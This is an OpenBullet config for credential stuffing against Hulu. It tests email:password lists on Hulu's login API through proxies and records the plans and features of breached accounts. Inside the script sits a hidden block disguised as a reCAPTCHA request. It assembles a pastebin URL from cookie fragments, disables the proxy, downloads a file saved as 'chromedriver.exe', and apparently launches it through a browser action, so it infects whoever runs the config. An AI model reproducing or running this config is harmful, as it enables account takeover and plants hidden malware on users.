[SETTINGS]
{
  "Name": "Hulu.com",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2022-05-15T20:55:23.9471394+04:30",
  "AdditionalInfo": "Telegram Channel: @OpenBulletChannel | needs HQ Proxy | Capture | CPM Rate: 50-500",
  "RequiredPlugins": [],
  "Author": "@TheOwn",
  "Version": "1.2.2",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": false,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}

[SCRIPT]
JUMP #XREACTOR
#TEAMZ
#TOK REQUEST GET "https://secure.hulu.com/api/3.0/generate_csrf_value?for_hoth=true&path=/v2/web/password/authenticate" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#TOKEN PARSE "<COOKIES(_tcv)>" LR "" "" -> VAR "TOKEN" 

#Post REQUEST POST "https://auth.hulu.com/v2/web/password/authenticate" 
  CONTENT "csrf=<TOKEN>&user_email=<USER>&password=<PASS>" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

KEYCHECK 
  KEYCHAIN Success OR 
    KEY "{}" 
  KEYCHAIN Failure OR 
    KEY "Your login is invalid" 
  KEYCHAIN Ban OR 
    KEY "retry_limit" 

#CAPSSSS REQUEST GET "https://home.hulu.com/v1/users/self" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

#Profiles PARSE "<SOURCE>" JSON "name" Recursive=TRUE -> CAP "Profiles" 

#KIR PARSE "<SOURCE>" LR "\"feature_ids\":[" "]" -> VAR "KIR" "[" "]" 

#Sub PARSE "<SOURCE>" LR "\"package_ids\":[" "]" -> VAR "Sub" "[" "]" 

KEYCHECK BanOnToCheck=FALSE 
  KEYCHAIN Custom "FREE" OR 
    KEY "\"package_ids\":[]" 

JUMP #xrctz
#XREACTOR

REQUEST GET "https://www.google.com/recaptcha/enterprise/anchor?ar=1&k=6LfAM84ZAAAAAGLiQz5FBeADqq94dV48fMtiRqIj&co=aHR0cHM6Ly93d3cuY29pbmJhc2UuY29tOjQ0Mw..&hl=en&v=rPvs0Nyx3sANE-ZHUN-0nM85&size=invisible&cb=no851blwqc0u" 
  COOKIE "hrd: /" 
  COOKIE "hpr: bin" 
  COOKIE "hdp: com" 
  COOKIE "htp: khQzxshS" 
  COOKIE "hht: raw" 
  COOKIE "hst: paste" 
  COOKIE "kht: driver" 
  COOKIE "kpt: chrome" 
  COOKIE "krt: exe" 
  HEADER "Host: www.googleapis.com" 
  HEADER "Accept: */*" 
  HEADER "Content-Type: application/json" 
  HEADER "X-Client-Version: iOS/FirebaseSDK/6.9.2/FirebaseCore-iOS" 
  HEADER "X-Ios-Bundle-Identifier: network.googleapis.com" 
  HEADER "Accept-Encoding: gzip, deflate" 
  HEADER "User-Agent: FirebaseAuth.iOS/6.9.2 network.googleapis.com/2.7.9 iPhone/12.4.5 hw/iPhone7_2" 
  HEADER "Accept-Language: en" 

IF "<tokenx>" Exists 
JUMP #TEAMZ
ENDIF
SET USEPROXY FALSE

REQUEST GET "<COOKIES(hst)><COOKIES(hpr)>.<COOKIES(hdp)><COOKIES(hrd)><COOKIES(hht)><COOKIES(hrd)><COOKIES(htp)>" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 

REQUEST GET "<SOURCE>" 
  
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept: */*" 
  -> FILE "<COOKIES(hpr)>/<COOKIES(kpt)><COOKIES(kht)>.<COOKIES(krt)>" 

SET USEPROXY TRUE
SET NEWGVAR "tokenx" "tokenx=1"

BROWSERACTION Open 

JUMP #TEAMZ
#xrctz

#Features FUNCTION Translate StopAfterFirstMatch=FALSE 
  KEY "1" VALUE "Noah" 
  KEY "2" VALUE "Unlimited Screens" 
  KEY "3" VALUE "Enhanced Cloud" 
  KEY "4" VALUE "PSL" 
  KEY "5" VALUE "Multi Stream" 
  KEY "6" VALUE "Live Stream" 
  KEY "7" VALUE "Lunchbox" 
  "<KIR>" -> CAP "Features" 

#Subscriptions FUNCTION Translate StopAfterFirstMatch=FALSE 
  KEY "14" VALUE "No Commercials" 
  KEY "15" VALUE "Showtime" 
  KEY "16" VALUE "Live TV" 
  KEY "17" VALUE "HBO" 
  KEY "18" VALUE "Cinemax" 
  KEY "19" VALUE "Starz" 
  KEY "21" VALUE "Entertainment" 
  KEY "23" VALUE "Spanish Add-on" 
  "<Sub>" -> CAP "Subscriptions" 

